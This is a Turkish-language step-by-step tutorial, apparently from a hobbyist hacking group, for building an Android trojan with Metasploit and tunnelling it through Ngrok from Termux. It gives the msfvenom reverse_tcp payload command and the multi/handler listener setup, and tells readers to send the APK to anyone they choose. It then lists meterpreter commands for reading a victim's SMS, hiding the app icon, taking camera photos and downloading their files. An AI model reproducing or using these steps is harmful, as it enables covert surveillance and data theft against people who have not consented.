Sırayla anlatacağım
1)Metasploit,Trojen,Ngrok tanımları anlatıyorum
2)Metasploit ve Ngrokun nasıl kurulacağını anlatıyorum
3)Metasploit ve Ngroku kurduktan sonra nasıl trojen oluşturulur
1)
Metasploit,Trojen,Ngrok kavramları nedir?
A)Trojen nedir
B)Metploit nedir
C)Ngrok nedir
A)Trojen nedir; Trojan, genellikle meşru yazılım kılığındaki bir tür kötü amaçlı yazılımdır. Trojanlar, kullanıcıların sistemlerine erişmeye çalışan siber hırsızlar ve korsanlar tarafından kullanılabilir. Kullanıcılar genellikle bir tür sosyal mühendislik tarafından kandırılarak Trojanları sistemlerine yükler ve çalıştırırlar. Trojanlar etkinleştirildikten sonra siber suçluların sizi takip etmelerini, hassas verilerinizi çalmalarını ve sisteminize arka kapı erişimi elde etmelerini sağlar. Bu işlemler arasında şunlar bulunabilir:
Veri silme
Veri engelleme
Veri değiştirme
Veri kopyalama
Bilgisayarların veya bilgisayar ağlarının performansını düşürme
Truva atları, diğer bilgisayar virüsleri ve solucanlarının aksine kendi kendilerine çoğalamaz
B)Metasploit nedir; Metasploit, sızma testlerinde kullanılabilecek en idal yazılımlardan birisidir, içerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Metasploit ile sadece saldırı yapılmaz. İşletim sistemlerinde yönelik backdoorlar oluşturulabilir ve bunlar üzerinden hedef sisteme saldırı ve ele geçirme işlemi yapılır.
C)Ngrok nedir; Ngrok herhangi bir Firewall veya NAT arkasında koşan yerel sunucumuzu tünelleyerek internete çıkartmamızı sağlayan reverse proxy yazılımıdır.(bu yazılım sayesinde modemde port açmamıza gerek yoktur.)
2)
Metasploit ve Ngrok nasıl kurulur?
A)Metasploit nasıl kurulur?
B)Ngrok nasıl kurulur?
A)Metasploiti kuralım;
Metasploit benim tooldan kuracaz çünkü normal kurarsak ruby hatası alacaz msfconsolu çalıştırırken, isterseniz deneyin.
Metasploiti kuralım fakat bu aşamada adımları doğru yapmazsak tekrar hata alırız en küçük bişey bile kurulumu etkiler o yüzden termuxu sıfırlıyoruz ve sıfırladıktan sonra hiçbirşey kurmuyoruz
bu işlemleri yapmadan kurarsaniz %90 hata verecektir sonra gurupta "NeDeN HaTa VeRdİ" "ToOL BoZuK YhA" yazmayin
kodlara gelelim
bazı kişilerde termux repo sorunu olduğu için toolu indirmeden önce
termux-change-repo
komutunu yazıyoruz karşımıza grafiksel bi arayüz çıkacak orda
bu videoda yapılanın aynısını yapacaksınız
aynı ekran olmazsa bile girimler yazanı seçin mk
videodakini yaptıktan sonra başlayalım kurmaya
(gelen soruları görmek için ekranı büyütün,ve tüm gelen sorularda küçük y basın)
1-pkg install git -y
2-git clone https://github.com/jokzilla/metakurucu.git
3-cd metakurucu
4-chmod +x *
5-bash metakurucu.sh
toolumuz indi 1i seçiyoruz ve kurulum başladı
(gelen tüm sorularda y basın)
termuxu yeniden başlatın yazısı geldikten sonra termuxu arka plandan kapatıyoruz sonra bildirim panelini açıyoruz ve ordan da exit diyoruz
burdaki işlemimiz bu kadar şimdi ngroku kuralım
B)Ngroku kuralım;
termuxu tekrar açıyoruz
1-pkg install git -y
2-git clone https://github.com/Umutkaratools/NGROK-KURULUM
3-cd NGROK-KURULUM
4-chmod 777 ngrok-kurulum.sh
5-bash ngrok-kurulum.sh
Ngrok kurulum başarısız diyorsa BURAYA girin
ngrok kuruludu fakat tcp bağlantısı açmamız için ngrokun sitesine;
https://dashboard.ngrok.com/signup
kaydolup ordaki tokeni kopyalamamiz gerekiyor yeşil renk ile işaretlediğim yeri(token) kopyalıyoruz ve terminale yapıştırıyoruz(./ almıyoruz ngroktan itibaren kopyaliyoruz)
3)
Trojan nasıl oluturulur;
ngrok tcp 1275 yazıyoruz bunu yaparken mobil veri ile internet paylaşımının açık olması gerekiyor bu resimdeki
online yazan yer kırmızı olursa demek ki sorun vardır (ngrok düzgün kurulmamıştır yada internet paylaşımını açmayı unutmuşsunuzdur)
ngrok ekranını asla kapatmıyoruz kapatırsak dinleme gidecektir
sol tarafı kaydırın new seassion yazana basin sonra
termux-setup-storage
depolama izni veriyoruz çünkü trojenin sdcarda(dahili hafıza) kaydedilmesi için
resimde belirttiğim gibi altaki paylodda LHOST ve RHOST yazan yere burdaki bilgiyi yazacaz(sizde verilenleri yazin sizde ki)
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk
sondaki android apk yazan yer trojanimizin ismidir istediğinizi yazabilirsiniz fakat sonuna .apk yazmak zorundasınız enter basıyoruz ve
trojaniniz sdcard(dahili hafızaya kaydoldu)
TROJENİ DİNLEMEYE ALALIM
msfconsole yazıp entere basıyoruz ve 15-20 saniye msfconsole ekranının açılmasını bekliyoruz ardından
Metasploit'te Çoklu işleyiciyi başlatmak için bu komutu yazıyoruz;
↓↓↓
use exploit/multi/handler
burda trojeni oluşturuken yazdığımız payloadı yazıyoruz yani;
↓↓↓
set payload android/meterpreter/reverse_tcp
Şimdi oturumu dinlemek istediğiniz LHOST'u ayarlıyoruz yani;
↓↓↓
set LHOST 127.0.0.1
Şimdi oturumu dinlemek istediğiniz RPORT'u ayarlıyoruz yani "ngrok tcp 1275"
yazdığımız yere burdaki sayıyı alıyoruz "1275"
↓↓↓
set LPORT 1275
ve son komutumuzu yazıyoruz exploit diyerek dinlemeye alıyoruz artık oluşturduğumuz apk yı istediğimiz kişiye atıyoruz ve o indirip açtığında böyle bi ekran karşımıza çıkacak(meterpreter yazmazsa gorseldeki gibi yanliş yaptiğiniz biseyler vardir)
↓↓↓
help yazıp neler yapabileceğimze bakıyoruz iyi kullanımlar
İŞİNİZE YARIYACAK BAZI KOMUTLAR
Kurbanın telefonundan telefonunuza SMS alın:
Bu komut size kurbanın telefonundan en son 50 SMS'i verecektir.
dump_sms
(Bu bizim home dizinimize(ana dizine kaydolacak)
Çektiğimiz smsleri açmak için cat komutunu kullanacaksınız
Kurbana gönderdiğiniz Apk'nin simgesini gizleyin:
Kurbanın telefonlarına bir uygulama yüklüyorsanız, kurbanın uygulamanın ve kurbanın kurban olma şansının aşağıdaki komutu kullanarak app.by kaldıracağını fark edeceği açıktır, uygulama simgesini kurbanın telefonundan gizleyebilirsiniz.
hide_app_icon
Kurbanın telefonunun ses modunu değiştirin:
aşağıdaki komutu kullanarak telefonu genel modda ayarlayabilirsiniz.
set_audio_mode -m 1
telefonu sessize almak için;
set_audio_mode -m 0
Kurbanın telefonundan fotoğraf çekin: Bu komut kurbanın kamerasından bir fotoğraf çekecek ve depolama klasörünüze gönderecektir.
webcam_snap
Kurbanların dosya depolamasına erişin:
Kurbanın dosyasına gidebilir ve herhangi bir klasördeki tüm verileri görebilirsiniz
cd /sdcard
Kurbanın telefonundan herhangi bir dosyayı indirin:
karşıdan yüklemek istediğiniz dosyaya gidin ve bu komutu yazın
download file-name
Bunu ben yazmadım ama sizin için yararlı olacağını düşünüyorum hoşçakalın.